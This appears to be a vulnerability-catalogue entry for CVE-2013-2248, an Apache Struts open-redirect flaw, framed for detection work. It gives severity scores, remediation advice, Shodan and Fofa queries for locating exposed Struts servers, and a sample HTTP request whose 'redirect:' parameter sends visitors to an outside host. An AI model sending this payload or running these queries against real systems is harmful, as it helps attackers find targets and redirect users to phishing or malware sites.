🔙 목록으로 돌아가기

CVE-2013-2248: Apache Struts - Multiple Open Redirection Vulnerabilities

TitleApache Struts - Multiple Open Redirection Vulnerabilities
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware.
RemediationDevelopers should immediately upgrade to Struts 2.3.15.1 or later.
CVSS Score5.8
EPSS Score0.93524
CVE IDCVE-2013-2248
CWE IDCWE-20
Shodan Queryhttp.html:"apache struts"http.title:"struts2 showcase"http.html:"struts problem report"
Fofa Querybody="struts problem report"title="struts2 showcase"body="apache struts"
Tags cve2013 cve apache redirect struts edb vuln

🔍 Vulnerability Description

Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.

🌐 HTTP Request

GET /index.action?redirect:http://www.interact.sh/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/10.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-2248.yaml

🦈 Packet Capture: ⬇️ Download cve-2013-2248.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A